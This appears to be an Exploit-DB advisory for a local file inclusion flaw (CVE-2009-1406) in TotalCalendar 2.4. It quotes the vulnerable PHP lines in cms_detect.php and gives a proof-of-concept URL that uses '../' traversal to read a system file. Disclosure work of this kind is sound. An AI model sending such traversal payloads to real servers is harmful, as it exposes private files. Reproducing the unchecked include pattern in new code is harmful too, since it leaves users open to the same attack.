Lucene search
SirGodEDB-ID:8503HistoryApr 21, 2009 - 12:00 a.m.
TotalCalendar 2.4 - 'Include' Local File Inclusion
2009-04-2100:00:00
SirGod
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################
[+] Local File Inclusion
Vulnerable code in cms_detect.php:
-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------
PoC :
http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK
##########################################################################################
# milw0rm.com [2009-04-21]Related
seebug
seebug
TotalCalendar cms_detect.php模块本地文件包含漏洞
2009-04-28 00:00:00
cvelist
cvelist
CVE-2009-1406
2009-04-24 14:00:00
nvd
nvd
CVE-2009-1406
2009-04-24 14:30:00
prion
prion
Directory traversal
2009-04-24 14:30:00
cve
cve
CVE-2009-1406
2009-04-24 14:30:00